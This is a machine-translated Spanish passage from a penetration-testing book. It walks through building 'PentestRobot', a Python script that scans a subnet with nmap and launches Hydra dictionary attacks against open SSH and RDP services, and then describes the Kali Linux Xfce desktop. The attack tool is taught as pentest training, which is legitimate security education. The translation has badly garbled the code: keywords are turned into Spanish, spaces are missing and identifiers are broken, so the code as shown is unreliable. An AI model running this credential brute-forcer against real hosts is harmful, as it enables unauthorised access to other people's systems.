, el usuario ingresará una sola IP por rango (en formato CIDR), luego la aplicación realizará las siguientes acciones: 1. Valide la entrada. 2. Buscar hosts en vivo. 3. Los puertos escanean los hosts en vivo y buscan los puertos 22 y 3389. 4.Si los puertos están abiertos, intente un ataque de diccionario. Canal de Telegram : @IRFaraExam Machine Translated by Google 5. Guarde los resultados finales en un archivo de texto. Así es como se ve la versión final de la aplicación cuando se ejecuta: root @ kali: ~ / pythonLab #. / pentest_robot.py WelcomeToPentestRobot ############################ ####### ##### Ingrese una IP única por rango en formato CIDR (por ejemplo, 192.168.0.0 / 24): IP / CIDR> 172.16.0.0/24 [i]Comprobando hosts vivos… [+]172.16.0.1isup [+]172.16.0.2isup [+]172.16.0.100isup [+]172.16.0.103isup [+]172.16.0.107isup [i]Iniciando Nmapportscanonhost172.16.0.1 ####################################### ###### [i]IniciandoNmapportscanonhost172.16.0.2 [+]PortOpen:3389/ tcp,ServiceName:ms-wbt-server [i]IniciandoRDPBruteForceonhost172.16.0.2 ############################################ [i]IniciandoNmapportscanonhost172.16.0.100 [+]PortOpen:3389/ tcp,ServiceName:ssl/ms-wbt-server? [i]IniciandoRDPBruteForceonhost172.16.0.100 ###################################### ######## [i]Iniciando Nmapportscanonhost172.16.0.103 ############################################ [i]IniciandoNmapportscanonhost172.16.0.107 [+]PortOpen:22/ tcp,ServiceName:ssh [i]IniciandoSSHBrute-Forceonhost172.16.0.107 #################### ########################### [*]PentestRobotTerminóLaEjecución! Canal de Telegram : @IRFaraExam Machine Translated by Google Canal de Telegram : @IRFaraExam Machine Translated by Google Figura 18.1 Flujo de trabajo de la aplicación NOTA El código fuente completo de este capítulo estará disponible para su descarga en GitHubat github.com/GusKhawaja/PentestRobot. Paquetes de Python Antes de comenzar a desarrollar esta aplicación, veamos un truco para instalar paquetes de Python a través de la línea de comandos. $aptupdate $aptinstallpython3-pip Por ejemplo, yapf es un formateador de Python que lo ayudará a formatear su código fuente de Python (para un desarrollo de código limpio). Para instalarlo en Kali, puede usar pip3 para hacer el trabajo, como se muestra aquí: root@kali:~#pip3installyapf Siempre que quiera usar un paquete nuevo, VSCode usará pip3 para instalarlo (puede usar yapf para formatear su código Python dentro de VSCode). Por lo tanto, necesitará instalar pip3 antes de desarrollar una aplicación completa (como la que estamos construyendo en este capítulo). Inicio de la aplicación En esta sección, comenzaremos a crear esta aplicación. Crearemos cada pieza según el diagrama de flujo de trabajo de la Figura 18.1 . El primer paso es imprimir un banner y asegurarse de que el usuario entienda lo que necesita ingresar. Hay una técnica en Python que no cubrimos en el capítulo anterior. Esta condición ( sentencia if ) se llama al principio cuando se carga la aplicación. De hecho, aquí es donde vamos a insertar nuestras tareas de inicio. El formato de la sentencia if se verá así: Canal de Telegram : @IRFaraExam Machine Translated by Google if__name__=='__principal__': [Aquí, agrega el script que se ejecutará primero] No te preocupes, entenderás en el siguiente ejemplo cómo funciona. Insertaremos toda la lógica de carga dentro de esta condición (porque necesitamos que se ejecuten primero): #!/usr/bin/python3 if__name__=='__principal__': """ Aquí es donde se llama por primera vez a la aplicación """ #printBanner print("BienvenidoaPentestRobot") print("##########################") print("Ingresar un solo IPorRangoenformatoCIDR(eg192.168.0.0 /24):") #userinput cidr_input=input("IP/CIDR>") imprimir(cidr_input) Guarde el script y llámelo pentest_robot.py . El resultado de este script se verá así (tenga en cuenta que estoy usando Visual Studio Code en la unidad): Bienvenido a PentestRobot ########################## Ingrese un solo IPorRango en formato CIDR (por ejemplo, 192.168.0.0 / 24): IP / CIDR> 172.16.0.1 172.16.0.1 Validación de entrada Ahora es el momento de abordar el segundo paso en el diagrama de flujo de trabajo de la aplicación, y es la validación de entrada. El usuario ingresará una sola dirección IP o un rango en formato CIDR. raw.githubusercontent.com/python/cpython/3.9/Lib/ipaddress.py A continuación, importe este módulo usando la siguiente línea: fromipaddressimportip_network Canal de Telegram : @IRFaraExam Machine Translated by Google Dado que usaremos el método ip_network, use la sintaxis de puerto para que esto suceda. Este patrón evitará que repitamos la misma sintaxis ip_network repetidamente en nuestro script : #!/usr/bin/python3 fromipaddressimportip_network defvalidar_entrada(cidr_entrada): """ Validateuserinput-IPAddressCIDRformat """ hosts=[] prueba: hosts=list(ip_network(cidr_input).hosts()) excepto: imprimir ('Entrada no válida! Ejemplo de rango de CIDRIP válido: 192.168.0.0/24') volver Ninguno volverhosts if__name__=='__principal__': """ Aquí es donde se llama por primera vez a la aplicación """ #printBanner print("BienvenidoaPentestRobot") print("##########################") print("Ingresar un solo IPorRangoenformatoCIDR(eg192.168.0.0 /24):") #userinput cidr_input=entrada("IP/CIDR>") hosts=validate_input(cidr_input) Para garantizar la calidad, probemos los tres casos de escenario: Entrada de una sola dirección IP Entrada de rango de CIDR válido Una entrada de rango de CIDR no válida Escenario 1: IP única (expectativa: sin errores): Bienvenido a PentestRobot Canal de Telegram : @IRFaraExam Machine Translated by Google ########################## EnterasingleIPorRangeinCIDRformat (por ejemplo, 192.168.0.0 / 24): IP / CIDR> 172.16.0.1 root ali kali: # Escenario 2: rango válido de direcciones IP (expectativa: sin errores): WelcomeToPentestRobot ######################### Ingrese un solo IPorRango en formato CIDR (por ejemplo, 192.168.0.0 / 24): IP / CIDR> 172.16.0.0/24 root Kali: # Escenario 3: formato CIDR no válido (expectativa: un mensaje de error debe imprimirse): WelcomeToPentestRobot ######################### Ingrese un solo IPorRango en formato CIDR (por ejemplo, 192.168.0.0/24): IP/CIDR> 172.16.0.1/24 ¡Entrada no válida! Ejemplo de rango CIDRIP válido: 192.168.0.0/24 root @ kali: # Refactorización de código Una metodología de refactorización de codificador se asegurará de evitar prácticas terribles de programación (como copiar el mismo código en varios lugares, etc.). Los programadores hablan de esto todos los días, por lo que desarrollan un código fuente limpio. ¿Cómo podemos aplicar este principio a nuestra aplicación? 1. Tendremos que imprimir una línea de separación en varios lugares. 2. Tendremos que ejecutar comandos en varios lugares. Crearemos un objeto de clase llamado UTILIDADES y agregaremos dos métodos que cubrirán los dos escenarios: clase de subproceso de importación UTILIDADES: def__init__(self): """ constructor de clases """ defseparator_line(self):return"###############################" Canal de Telegram : @IRFaraExam Machine Translated by Google defexecute_command(self,cmd): """ Esta función ejecutará el comando de ventana terminal """ #declarethecommandoutputvariable cmd_output= "" intente: cmd_output=subprocess.check_output(cmd,shell=True, stderr=subproceso.STDOUT) cmd_output=cmd_output.decode("utf-8") cmd_output+="\n%s\n"%self.seperator_line() exceptoExceptionase: print(str(e)) print("Errorcannotexecutethecmd: %s"%cmd) finalmente: returncmd_output Escaneo de hosts activos El siguiente paso en el diagrama de flujo de trabajo es buscar hosts activos. Usaremos Nmap para realizar el trabajo en función de la entrada del usuario (IP única versus rango): classHostScan: def__init__(self,host_ip): """ constructor de clases """ self.host_ip=host_ip self.util=UTILIDADES() defis_host_live(uno mismo): """ Comprobar si un host está activo y ejecutándose en la red """ nmap_cmd="nmap-sn%s"%self.host_ip nmap_output=self.util.execute_command(nmap_cmd) if("1hostup"innmap_output): print("[+]%sisup"%self.host_ip) returnTrue else: returnFalse defvalidar_entrada(cidr_entrada): """ Validateuserinput-IPAddressCIDRformat Canal de Telegram : @IRFaraExam Machine Translated by Google """ hosts=[] try: hosts=list(ip_network(cidr_input).hosts()) excepto: print('Invalidinput! AvalidCIDRIPrangeexample:192.168.0.0/24') volver Ninguno volverhosts if__name__=='__principal__': """ Aquí es donde se llama por primera vez a la aplicación """ útil = UTILIDADES () #printBanner print("WelcomeToPentestRobot") print(util.separator_line()) print("EnterasingleIPorRangeinCIDRformat(eg192.168.0.0/24):") #userinput cidr_input=entrada("IP/CIDR>") hosts=validate_input(cidr_input) #iftheCIDRvalueisvalid if(hosts! =Ninguno): print("\n[i]Comprobando hosts activos...") LIVE_HOSTS=[] forhostinhosts: escáner=HostScan(host) if(scanner.is_host_live()): LIVE_HOSTS.append(host) print(LIVE_HOSTS) Para probar esta nueva pieza de código, implementaremos los siguientes dos casos de prueba: ConunaúnicadirecciónIP(queseestáejecutando) ConunrangodedirecciónIP(subredcompleta) Escenario 1 (expectativa:hostislive): WelcomeToPentestRobot ############################################# EnterasingleIPorRangeinCIDRformat (por ejemplo, 192.168.0.0/24): Canal de Telegram : @IRFaraExam Machine Translated by Google IP/CIDR> 172.16.0.1 [i]Comprobando hosts activos... [+]172.16.0.1isup [Dirección IPv4('172.16.0.1')] root@kali:~# Escenario 2 (expectativa: detectar los hosts activos correctamente en la red): WelcomeToPentestRobot ############################# (por ejemplo, 192.168.0.0 / 24): IP / CIDR> 172.16.0.0/ 24 [i]Comprobando hosts activos… [+]172.16.0.1isup [+]172.16.0.2isup [+]172.16.0.100isup [+]172.16.0.103isup [+]172.16.0.107isup [IPv4Address('172.16.0.1'), DirecciónIPv4('172.16.0.2'),DirecciónIPv4('172.16.0.100'),DirecciónIPv4('172.16.0.103'),DirecciónIPv4('172.1 Escaneo de puertos y servicios En esta etapa, tenemos una lista de las direcciones IP de los hosts en vivo. A continuación, escanearemos cada host en vivo encontrado en el paso anterior y buscaremos dos puertos abiertos, 22 y 3389. Otro desafío en este paso es formatear la salida de Nmapscan . para puertos abiertos 22 y 3389. 2. Cree un segundo método (llamado parse_nmap_output ) que analizará la salida de escaneo deportivo de Nmap y devolverá una lista de elementos de servicio personalizados ( Service DTO ). 3. Cree una clase llamada servicio DTO (DTO significa objeto de transferencia de datos) que se usará en el valor de retorno del método anterior. 4. Por último, llame al método de exploración de puertos desde la sección principal de la aplicación. Primero, cree los dos métodos dentro de la clase HostScan : Canal de Telegram : @IRFaraExam Machine Translated by Google classHostScan: def__init__(self,host_ip): """ constructor de clases """ self.host_ip=host_ip self.util=UTILIDADES() defis_host_live(uno mismo): """ Comprobar si un host está activo y ejecutándose en la red """ nmap_cmd="nmap-sn%s"%self.host_ip nmap_output=self.util.execute_command(nmap_cmd) if("1hostup"innmap_output): print("[+]%sisup"%self.host_ip) returnTrue else: returnFalse defport_scan(auto): """ los puertos pueden ser un host, también puede agregar una versión para obtener la información sobre el servicio. """ print("[i]IniciandoNmapportscanonhost%s"%self.host_ip) nmap_cmd="nmap-sVp22,3389--open%s"%self.host_ip nmap_output=self.util.execute_command(nmap_cmd) returnnmap_output defparse_nmap_output(self,nmap_output): """ resultados de parsethenma """ service:names_list={} nmap_output=nmap_output.split("\n") foroutput_lineinnmap_output: output_line=output_line.strip() services_list=[] #ifportisopen if("tcp"inoutput_line)and("open" inoutput_line)andnot("Discovered "inoutput_line): #cleanupthespaces while""inoutput_line: output_line=output_line.replace("","") Canal de Telegram : @IRFaraExam Machine Translated by Google #Splittheline output_line_split=output_line.split("") #La tercera parte de la división es el servicio de nombre de servicio: nombre = salida_línea_división [2] #Laprimerapartedeladivisióneselnúmerodepuertoport_number=output_line_split[0] #Gettheservicedescription salida_línea_dividida_longitud=largo(salida_línea_dividida) end_position=salida_línea_dividida_longitud-1 posición_actual=3 servicio:descripción= '' whileposición_actual<=posición_final: ' ' servicio:descripción+=posición_actual] +output_line_split[ posición_actual+=1 #CreatetheserviceObject service=ServiceDTO(número_puerto, servicio:nombre, servicio:descripción) #Asegúresedeagregarunnuevoserviciosiyaexisteotroenunnúmerodepuertodiferente ifservice:nombreenservicio:lista_de_nombres: #Obtenerlosobjetosqueseguardaronpreviamente services_list=service:names_list[service:name] services_list.append(servicio) print("[+]PortOpen:%s,ServiceName:%s"%(service.port,service.name)) servicio:lista_de_nombres[servicio:nombre]=lista_de_servicios servicio de devolución: lista_de_nombres En segundo lugar, cree la clase DTO; este objeto contendrá la información sobre cada servicio que se encuentra en la salida de Nmap: claseServicioDTO: """ Esta clase DTO de servicio mantendrá el valor del objeto después de una nmapscan """ #ClassConstructor def__init__(self,puerto,nombre,descripción): self.description=descripción Canal de Telegram : @IRFaraExam Machine Translated by Google self.port=puerto self.name=nombre Finalmente, llame al método Nmapscan desde la sección principal: if__name__=='__principal__': """ Aquí es donde se llama por primera vez a la aplicación """ útil = UTILIDADES () #printBanner print("WelcomeToPentestRobot") print(util.separator_line()) print("EnterasingleIPorRangeinCIDRformat(eg192.168.0.0/24):") #userinput cidr_input=entrada("IP/CIDR>") hosts=validate_input(cidr_input) #iftheCIDRvalueisvalid if(hosts! =Ninguno): print("\n[i]Comprobando hosts activos...") LIVE_HOSTS=[] forhostinhosts: escáner=HostScan(host) if(scanner.is_host_live()): LIVE_HOSTS.append(host) print("\n") #ifwehavelivehosts if(len(LIVE_HOSTS)>0): forlive_hostinLIVE_HOSTS: scanner_live_hosts=HostScan(live_host) port_scan_results=scanner_live_hosts.port_scan() parsed_nmap_results=scanner_live_hosts.parse_nmap_output(port_scan_results) Es hora de probarlo. Usaremos un escenario de casos de prueba (usando un rango de direcciones IP) donde ya conocemos los servicios de cada uno. El objetivo es probar la precisión de los resultados del escaneo de puertos: WelcomeToPentestRobot ############################################# EnterasingleIPorRangeinCIDRformat (por ejemplo, 192.168.0.0/24): Canal de Telegram : @IRFaraExam Machine Translated by Google IP/CIDR> 172.16.0.0/24 [i]Comprobando hosts vivos… [+]172.16.0.1isup [+]172.16.0.2isup [+]172.16.0.100isup [+]172.16.0.103isup [+]172.16.0.107isup [i]IniciandoNmapportscanonhost172.16.0.1 [i]IniciandoNmapportscanonhost172.16.0.2 [+]PortOpen:3389/ tcp,ServiceName:ms-wbt-server [i]IniciandoNmapportscanonhost172.16.0.100 [+]PortOpen:3389/tcp,ServiceName :tcpwrapped [i]IniciandoNmapportscanonhost172.16.0.103 [i]IniciandoNmapportscanonhost172.16.0.107 [+]PortOpen:22/ tcp,ServiceName:ssh Atacar las credenciales y guardar los resultados Esta es la etapa final de esta aplicación. En esta fase, utilizaremos un ataque adicional contra los servicios del paso de exploración de puertos . Llamaremos al comienzo de esta fase enumeración (es un nombre más suave que la palabra ataque), y en lugar de ataque de diccionario, lo llamaremos la etapa de fuerza bruta. Estas son las principales funciones que usaremos en este último paso: 1. Cree una clase llamada EnumerateHost . 2. Cree un método (llamado inicio ) dentro de la clase anterior que iniciará el fase de ataque 3. Agregue un método de fuerza bruta dentro de la misma clase que ejecutará el ataque de diccionario usando Hydra. Esta función usará archivos de diccionario de nombre de usuario y contraseña personalizados (guardados dentro de la carpeta de recursos). 4. Agregue un método final que guardará los resultados de este ataque de diccionario en un archivo dentro del directorio de informes (los cánceres guardan los resultados de cada host en un archivo diferente). 5. Finalmente , llame a los métodos de clase de EnumerateHost desde la sección principal de este solicitud. Primero, cree la clase EnumerateHost y sus métodos. Además, importe un módulo os adicional : Canal de Telegram : @IRFaraExam Machine Translated by Google importos classEnumerateHost: def__init__(self,nmap_results,host_ip): """ ClassConstructor """ self.nmap_results=nmap_results self.host_ip=host_ip self.util=UTILIDADES() defstart(uno mismo): """ Iniciarunprocesodenumeración """ '' output=forservice:nameinself.nmap_results: ifservice:name=="ssh": output+=self.bruteforce:ssh() elif"ms-wbt-server"inservice:name: output+=self.bruteforce:rdp() self.save_results(salida,'./informes',str(self.host_ip)+".txt") defbruteforce:ssh(uno mismo): """ Fuerza brutaSSHTarget """ print("[i]IniciandoSSHBrute-Forceonhost%s"%self.host_ip) cmd='hydra-t10-ensr-L./resources/ common_users.txt-P./resources/common_passwords.txtssh://'+str( self.host_ip) salida=self.util.execute_command(cmd) salida de retorno defbruteforce:rdp(uno mismo): """ Brute-ForceRDPTarget """ print("[i]IniciandoRDPBrute-Forceonhost%s"%self.host_ip) cmd='hydra-t10-ensr-L./resources/ common_users.txt-P./resources/common_passwords.txtrdp://'+str( self.host_ip) salida = self.util.execute_command(cmd) returnoutput defsave_results(self,resultados,nombre_carpeta,nombre_archivo): """ Datos guardados en un archivo Canal de Telegram : @IRFaraExam Machine Translated by Google """ tratar: #Guardarlosresultadosenunacarpeta/archivo nombre_archivo_ruta=nombre_carpeta+"/"+nombre_archivo #Silacarpetanoexisteentoncescrearlasinoes.path.isdir(folder_name): os.mkdir(folder_name) #Sielcontenidoestávacíoentoncessalirdeestafunción if(len(resultados)==0): return #Createthefileobject file_to_save=open(file_name_path,'w') #Writethechanges file_to_save.write(resultados) #Closefileobject file_to_save.close() excepto: print("[!]Error:No se pueden guardar los resultados en un archivo") En segundo lugar, llame a los métodos de clase desde la sección principal de esta aplicación. Además, agregaremos algunos toques finales a la sección principal: if__name__=='__principal__': """ Aquí es donde se llama por primera vez a la aplicación """ útil = UTILIDADES () #printBanner print("WelcomeToPentestRobot") print(util.separator_line()) print("EnterasingleIPorRangeinCIDRformat(eg192.168.0.0/24):") #userinput cidr_input=entrada("IP/CIDR>") hosts=validate_input(cidr_input) #iftheCIDRvalueisvalid if(hosts! =Ninguno): print("\n[i]Comprobando hosts activos...") LIVE_HOSTS=[] parahostinhosts: Canal de Telegram : @IRFaraExam Machine Translated by Google escáner=HostScan(host) if(scanner.is_host_live()): LIVE_HOSTS.append(host) print("\n") #ifwehavelivehosts if(len(LIVE_HOSTS)>0): forlive_hostinLIVE_HOSTS: scanner_live_hosts=HostScan(live_host) port_scan_results=scanner_live_hosts.port_scan() parsed_nmap_results=scanner_live_hosts.parse_nmap_output(port_scan_results) enum=EnumerateHost(parss_scan) enum.start() print(util.seperator_line()) else: print("[!]Nolivehoststoscan") print("\n[*]PentestRobotTerminóLaEjecución!") Recuerde que puede descargar el código fuente completo de esta aplicación en GitHubat github.com/GusKhawaja/PentestRobot. Resumen ¿Qué sigue? Eres un entusiasta y deberías poder crear tu aplicación a partir de aquí. El objetivo principal de este capítulo era ampliar tu visión para animarte a ser el próximo creador de una nueva aplicación de Python. Idealmente, este libro le da confianza en su carrera como probador de penetración. Canal de Telegram : @IRFaraExam Machine Translated by Google APÉNDICE A KaliLinuxDesktopataGlance En el momento de escribir este artículo, la última versión de Kali Linux es 2020.1. Esta versión de Kali presenta algunas funciones nuevas y este apéndice las cubre. Utilizo el sistema operativo Kali Linux la mayor parte del tiempo durante mis compromisos, y rara vez uso el sistema operativo Microsoft Windows para este propósito. Este apéndice se enfoca en cómo administrar la interfaz del entorno de escritorio Kali Linux. Aprenderá cómo manejar este sistema operativo con facilidad y personalizarlo a su gusto. Tenga en cuenta que este apéndice cubrirá la versión 2020 y posteriores de Kali Linux, por lo que las lecciones principales de este apéndice se basan en el entorno de escritorio Xfce. Esto es lo que cubre este apéndice: DescargaryejecutarunaVMdeKaliLinux UsodelmenúdelescritorioXfced DominarlosajustesdeconfiguracióndelsistemaKaliXfce CambiandoelaspectodesuentornoKalien Instalar KaliLinux desde cero Descargar y ejecutar una VM de Kali Linux Lo primero que debe hacer es descargar una copia de VM de Kali Linux en el siguiente enlace: www.offensive-security.com/kali-linux-vm-vmware-virtualbox-image download/ En esta página tiene tres opciones de descarga para elegir: KaliVM para VMware32/64 bits KaliVM para VirtualBox32/64 bits Canal de Telegram : @IRFaraExam Machine Translated by Google KaliVM para Hyper-V de 64 bits Una vez que descargue su VM, extraiga el archivo comprimido y abra el contenido utilizando el hipervisor de su elección. Al final de este apéndice, aprenderá cómo instalar Kali Linux desde cero utilizando una imagen ISO. (Esta instalación se recomienda para instalar Kalion como un host físico). Además, en el Apéndice B, le mostraré cómo ejecutar Kali Linux como contenedor Docker. REFERENCIA Las imágenes ARM también están disponibles para Kali Linux si posee una Raspberry Pi, por ejemplo. Estas imágenes están disponibles en el siguiente enlace: www.offensive-security.com/kali-linux-arm-images/ Si también tiene un dispositivo móvil Android, hay una versión disponible en KaliLinux, y se llama NetHunte si quieres probarlo: www.offensive-security.com/kali-linux-nethunter-download/ VirtualMachineFirstBoot Una vez que inicie su copia de VM de KaliLinux, verá el menú de carga, como se muestra en la Figura A.1. Elija Kali GNU/Linux y presione Intro. (Si no presiona nada, está bien; esta opción se elegirá de forma predeterminada después de unos segundos). Figura A.1 Elija Kali/Linux en el menú Cargar En las versiones anteriores de KaliLinux, la contraseña predeterminada era root/toor. A partir de esta versión (2020.1), Offensive Security (los creadores de KaliLinux) introdujeron el usuario no root. Entonces, el nombre de usuario es kali, y también lo es la contraseña. Canal de Telegram : @IRFaraExam Machine Translated by Google KaliXfceEscritorio A partir de la última versión de KaliLinux (2020.1), Xfce es el entorno de escritorio predeterminado. En esta sección, aprenderá cómo cambiar la apariencia del escritorio Xfcede para que pueda crear su propio entorno. Antes de esta versión, Gnome era el entorno de escritorio predeterminado, y si está interesado en volver a él, no se preocupe; aún puede elegirlo en el menú si instaló Kali desde una imagen ISO, como se muestra en la Figura A.2. Figura A.2 XfceInstallationOption Lo interesante del entorno de escritorio Xfcedes es que es liviano y funciona muy rápido, incluso con pocos recursos del sistema. Además, tiene un sistema operativo completamente personalizable y atractivo, como se muestra en la Figura A.3. Canal de Telegram : @IRFaraExam Machine Translated by Google Figura A.3 Escritorio Kali KaliXfceMenú El escritorio de Xfcede en Kaliuses the Whiskermenú le brinda una experiencia de usuario agradable (ligera) . Primero descubramos las áreas principales del menú, como se muestra en la Figura A.4. Barra de búsqueda La barra de búsqueda es una forma rápida de buscar sus aplicaciones. No se limita solo a buscar aplicaciones. Esto es lo que también puede hacer: Busque las páginas de manual de Linux anteponiendo su búsqueda con el carácter # (p. ej., #ls) Busque en la Web anteponiendo su búsqueda con el ? carácter (p. ej., ?Kali Linux) Busque en Wikipedia anteponiendo sus criterios de búsqueda con! w (p. ej., !w piratería ética) Ejecute un comando en la ventana del terminal anteponiéndolo con el! carácter (p. ej., !reboot, y si no eres root !sudoreboot ) FavoritosMenúElemento Canal de Telegram : @IRFaraExam Machine Translated by Google En la Figura A.4, puede ver el elemento del menú Favoritos mal seleccionado del menú, y en el lado derecho del panel puede ver su contenido. Figura A.4 Menú Kali Si desea eliminar algún elemento de esta lista, haga clic con el botón secundario en el elemento y seleccione Eliminar de favoritos, como se muestra en la Figura A.5. Canal de Telegram : @IRFaraExam Machine Translated by Google Figura A.5 Quitar de Favoritos Si desea agregar un elemento al menú Favoritos, primero busque su aplicación (p. ej., nmap) usando la barra de búsqueda, luego haga clic con el botón derecho y seleccione Agregar a favoritos, como se muestra en la Figura A.6. Figura A.6 Agregar a favoritos Aplicaciones habituales Si selecciona Aplicaciones habituales en el menú, verá todas las aplicaciones no relacionadas con las pruebas de penetración (p. ej., visor de imágenes, navegador web, etc.). Aunque no todas las aplicaciones están relacionadas, hay algunas excepciones en esta lista: Ettercap, King Phisher y XHydra. Estas son las herramientas que encontrará en esta lista: Accesorios Buscador de aplicaciones: busque y ejecute aplicaciones en Kali Canal de Telegram : @IRFaraExam Machine Translated by Google BulkRename : Cambiar el nombre de múltiples archivos CherryTree: aplicación jerárquica para tomar notas Clipman: administrador del portapapeles; una vez que su unidad, aparecerá un clip en la parte superior derecha del panel (aquí donde verá todos sus elementos copiados) DBBbrowserforSQLite : Administrador de GUI para bases de datos SQLite Mousepad: un editor de texto simplificado Notas: aplicación para tomar notas Captura de pantalla: Tome capturas de pantalla de su Kali SensorViewer : mostrar los valores del sensor de hardware Administrador de tareas : muestra los procesos actualmente en ejecución (tareas) y CPU + gráficos de memoria ThunarFileManager : administrador de archivos Vim: editor de texto Xarchiver: administrador de archivos Xfburn: herramienta de grabación de CD/DVD Gráficos RistrettoImageViewer: Imageviewerapp Xpdf: administrador de archivos PDF Internet ChromiumWebBrowser: Navegador web Firefox: navegador web Multimedia Kazam: Grabe videos y tome capturas de pantalla de su sesión ParoleMediaPlayer: reproductor multimedia PulseAudioVolumeControl:Audiovolumemanager Oficina Diccionario: Buscarpalabraseneldiccionario Otro Canal de Telegram : @IRFaraExam Machine Translated by Google KaliUndercoverMode: oculta el escritorio de Kalides cambiándolo para que se parezca a Windows 10 Sistema Gparted: administrador de particiones PrintSettings: configuración de impresoras QTerminal: ventana de terminal XfceTerminal: ventana de terminal Otros elementos de menú El elemento de menúUsados recientemente le muestra los programas que ha ejecutado recientemente. El elemento del menú Todo enumera todas las aplicaciones instaladas en Kali, y cubriré la parte de configuración en la siguiente sección. Finalmente, tiene el resto de los elementos del menú de herramientas de prueba de penetración preinstalados ( que se muestran en la Figura A.7 y agrupados por tipo de categoría de ataque). Administrador de configuración de KaliXfce Puede acceder a la configuración de Xfce desde el menú de dos maneras diferentes (ambas se muestran en la Figura A.8). La primera forma es seleccionar Configuración en el menú y todos los subelementos aparecen en el lado derecho del menú. Canal de Telegram : @IRFaraExam Machine Translated by Google Canal de Telegram : @IRFaraExam Machine Translated by Google Figura A.7 Herramientas del menú Kali Figura A.8 Menú de configuración de Kali Configuración avanzada de red En esta ventana, que se muestra en la Figura A.9, puede administrar las conexiones de red, como cableadas, inalámbricas o VPN. Canal de Telegram : @IRFaraExam Machine Translated by Google Figura A.9 Administración de la red Una vez que abra esta ventana, puede agregar, quitar o cambiar la configuración de una conexión de red. Los tipos de conexiones de red que puede administrar son los siguientes: Hardware Bluetooth DSL/PPPoE ethernet InfiniBand Banda ancha móvil Wifi Virtual Vínculo Puente Túnel IP Canal de Telegram : @IRFaraExam Machine Translated by Google MACsec Equipo VLAN vpn FortinetSSLVPN Protocolo de túnel de capa 2 (L2TP) VPN compatible con CiscoAnyConnect JuniperNetworkConnect OpenVPN Protocolo de túnel punto a punto (PPTP) VPN compatible con Cisco Apariencia Esta ventana le permite configurar y cambiar la apariencia de su entorno Kali. Estilo En la pestaña Estilo, que se muestra en la Figura A.10, puede elegir el tema de su elección; de manera predeterminada, el tema Kali-Dark está seleccionado. Canal de Telegram : @IRFaraExam Machine Translated by Google Figura A.10 KaliDarkTheme Iconos En la pestaña Icono, que se muestra en la Figura A.11, puede cambiar la apariencia visual de los iconos del escritorio (temas). Canal de Telegram : @IRFaraExam Machine Translated by Google Figura A.11 Iconos del escritorio fuentes En la pestaña Fuentes, que se muestra en la Figura A.12, puede personalizar las fuentes en el entorno de escritorio Kali Linux Xfcede. Canal de Telegram : @IRFaraExam Machine Translated by Google Figura A.12 Cambio de fuentes En esta ventana, puede hacer lo siguiente: Cambiar el estilo de fuente predeterminado Activar suavizado para suavizar los bordes de los caracteres Establezca sus puntos por pulgada (DPI más alto significa fuentes más nítidas) Configuración En Configuración, que se muestra en la Figura A.13, puede administrar los parámetros para controlar la apariencia de su Kali Linux. Canal de Telegram : @IRFaraExam Machine Translated by Google Figura A.13 Configuración de apariencia Estilo de barra de herramientas: en esta opción, puede cambiar la apariencia de la barra de herramientas eligiendo una de las siguientes opciones: Iconos (solo) Solo texto) Iconos de texto Texto junto a iconos MenúsyBotones ShowImagesOnButtons muestra un icono junto a los botones de diálogo de la ventana (no los botones dentro del panel). ShowImagesInMenus muestra un icono junto a los elementos de los menús de la aplicación y el menú del panel. EnableEditableAcceleratorslepermitedefinirunatajodetecladopara elementos de menú. Sonidos de eventos Habilitar sonidos de eventos le permite escuchar sonidos de eventos (p. ej., Canal de Telegram : @IRFaraExam Machine Translated by Google insertando una memoria USB en su Kali). Habilite los sonidos de retroalimentación de entrada para reproducir sonidos de eventos, como cambiar el tamaño de la ventana o presionar un botón, etc. Escritorio Esta ventana le permite cambiar el fondo, los menús y los iconos del escritorio. Antecedentes Esta pestaña tiene muchas opciones, como se muestra en la Figura A.14, que le brindan una imagen de fondo de escritorio de aspecto atractivo. Carpeta le da la opción de cambiar la ubicación de las imágenes. El estilo controla el tamaño de la imagen que mejor se adapta a su pantalla. Aplicar a todos los espacios de trabajo utiliza la misma imagen en todos los espacios de trabajo. El color se puede usar en lugar de una imagen y se puede combinar con una imagen más pequeña/semitransparente. ChangeTheBackgroundcambialaimagenaotrautilizandounlapsodetiempoquedefina.Además,puedeseleccionar Orden aleatorio para seleccionar imágenes de la lista de forma aleatoria. Canal de Telegram : @IRFaraExam Machine Translated by Google Figura A.14 Cambiar el fondo del escritorio Menús La pestaña Menú, que se muestra en la Figura A.15, le permite cambiar los menús del escritorio o de la lista de ventanas. Canal de Telegram : @IRFaraExam Machine Translated by Google Figura A.15 Menú Ajustes EscritorioMenú Incluir el menú de aplicaciones en el escritorio: al hacer clic con el botón derecho, se muestra el menú de aplicaciones (el mismo que ve en el panel superior) en la parte inferior. Mostrar iconos de aplicaciones en el menú muestra iconos junto al texto en el menú desplegable de la aplicación, que se muestra en la Figura A.16. Menú de la lista de ventanas: El menú de la lista de ventanas es visible al hacer clic con el botón central del mouse (haciendo clic en la rueda de desplazamiento) . Este menú le permitirá administrar los espacios de trabajo. Consulte la Figura A.17. Canal de Telegram : @IRFaraExam Machine Translated by Google Figura A.16 Menú Aplicaciones Figura A.17 Gestión de espacios de trabajo Iconos La pestaña Icono, que se muestra en la Figura A.18, le permite cambiar la apariencia de los iconos en el escritorio. Además, esta pestaña le brinda la opción de mostrar/ocultar los iconos predeterminados en el escritorio. Canal de Telegram : @IRFaraExam Machine Translated by Google Figura A.18 Configuración de iconos Mostrar Esta ventana le permitirá configurar los ajustes de visualización de su monitor. Esta sección es conveniente si desea utilizar varios monitores. General La pestaña General, que se muestra en la Figura A.19, le brinda la capacidad de administrar la configuración de su(s) monitor(es) conectado(s). Para cada monitor de pantalla, puede ajustar lo siguiente: Resolución Frecuencia de actualización Rotación Canal de Telegram : @IRFaraExam Machine Translated by Google Reflexión La Figura A.19 muestra una conexión virtual que está conectada. Avanzado La pestaña Avanzado, que se muestra en la Figura A.20, le permite habilitar perfiles y guardarlos para sus monitores conectados. Administrador de archivos En File Manager, que se muestra en la Figura A.21, puede controlar el comportamiento y el aspecto del administrador de archivos en el entorno de escritorio Kali Xfcede: Figura A.19 Configuración de pantalla Canal de Telegram : @IRFaraExam Machine Translated by Google Figura A.20 Configuración de pantalla avanzada Mostrar En la pestaña Pantalla, que se muestra en la Figura A.22 , puede cambiar la configuración de vista del administrador de archivos. Puede cambiar las siguientes configuraciones para el administrador de archivos: Vistapredeterminadadenuevacarpeta/mostrarminiaturas clasificación de carpetas Si el tamaño del archivo se muestra en formato binario Si el texto se muestra junto a los iconos El formato de fecha Canal de Telegram : @IRFaraExam Machine Translated by 